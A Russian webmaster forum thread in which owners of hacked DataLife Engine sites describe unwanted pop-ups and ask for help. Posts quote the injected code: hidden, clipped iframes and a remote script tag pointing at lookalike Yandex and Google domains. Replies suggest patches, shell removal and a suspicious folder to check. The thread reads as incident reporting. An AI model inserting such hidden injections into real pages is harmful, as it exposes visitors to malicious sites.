Взлом DLE всплывает окно на сторонний ресурс.

esys
На сайте с 22.06.2008
Offline
141
15355

Прошу помощи у тех кто разбирается. Установлена DLE, со вчерашнего дня на сайте с того не с сего стало появляться всплывающая страница на другой ресурс. Касперский выдает сообщение - Запрещено: http://webmaster-google.ru/crossdomain.xml

Вижу уже на трех сайтах вот один из них, давно лежит все руки не доходят, но отсутствие трафика не спасло его от злоумышленника:)

В конце документа вижу кучу ифреймов левых однако пока не понял как они туда попали в файле шаблона их нет. Поиск тоже не ищет(

И тп.


<iframe src="http://statsyandex.ru/BvmMRCV.cgi?3" style="position: absolute !important; overflow: hidden; clip: rect(1px 1px 1px 1px); clip: rect(1px, 1px, 1px, 1px); width: 255px; height: 655px;"></iframe>
<div id="start20130912"></div> <iframe src="http://yandex-webmaster.ru/JQYFE.cgi?3" style="position: absolute !important; overflow: hidden; clip: rect(1px 1px 1px 1px); clip: rect(1px, 1px, 1px, 1px); width: 421px; height: 273px;"></iframe>

Кто знает где собака зарыта подскажите, буду благодарен.

Тем не нашел похожих, что больше ни у кого нету?

Новая партнерка от Профит-Партнер! (http://tinyurl.com/q8p9m8c)<>Контент - дешево и качественно. (http://tinyurl.com/kv8cylb)<>100$ в день с развлекательного сайта (http://tinyurl.com/cjj5krx)
siv1987
На сайте с 02.04.2009
Offline
427
#1

Для начала вы тему не в том разделе создали. Если посмотреть в "безопасность" там куча подобных тем про взлом дле.

esys:
Кто знает где собака зарыта подскажите,

В дле.

Поставить все заплатки, удалить шеллы и сменить пароли

esys
На сайте с 22.06.2008
Offline
141
#2

Ну спасибо:) А тема таки не там, прошу администрацию перенести в раздел безопасность. Спасибо.

RF
На сайте с 31.08.2013
Offline
1
#3

обращайтесь помогу вылечить сайт)

R
На сайте с 24.01.2008
Offline
180
#4

ТС, в вашем случае проблеме не решится парами советов, к проверке нужно подходить комплексно, делать полную проверку, проводить анализ и т.д. и т.п.

Если сами не справитесь стучите!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
esys
На сайте с 22.06.2008
Offline
141
#5
Rxp:
ТС, в вашем случае проблеме не решится парами советов

Вроде таки решилась, утром еще посмотрим:) всем спасибо

nevinskiibomzh
На сайте с 05.05.2010
Offline
126
#6

У меня на сайте везде сегодня обнаружил на всех страницах <script type="text/javascript" src="http://google-webmaster.ru/903ce9225fca3e988c2af215d4e544d3.js"></script>

V1
На сайте с 10.08.2009
Offline
31
#7

тоже самое <script type="text/javascript" src="http://google-webmaster.ru/903ce9225fca3e988c2af215d4e544d3.js"></script>

Ишу качественного спеца по удалению вирусов

nevinskiibomzh
На сайте с 05.05.2010
Offline
126
#8

Никто больше не сталкивался? Поиском все файлы пересмотрел не чего не находит, заменил права доступа к файлам, упорно все равно появляется в статьях, может через редактор взломали...

---------- Добавлено 13.09.2013 в 11:51 ----------

нашел решение в этой теме /ru/forum/811966

грац.
На сайте с 13.08.2010
Offline
176
#9

Этот код в новости тыкается, у меня тоже пару сайтов хакнули. Сегодня вечером буду чистить и лататься :)

K5
На сайте с 21.07.2010
Offline
209
#10

рискну предположить: все кому прописали, проверьте наличие папки /engine/classes/masha/ в ней файлы LICENSE, ierange.js, masha.js

есть или нет?

p.s. почистил уже 8 сайтов клиентов, у всех папка была, шелл только на одном, dle 9.8-10

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий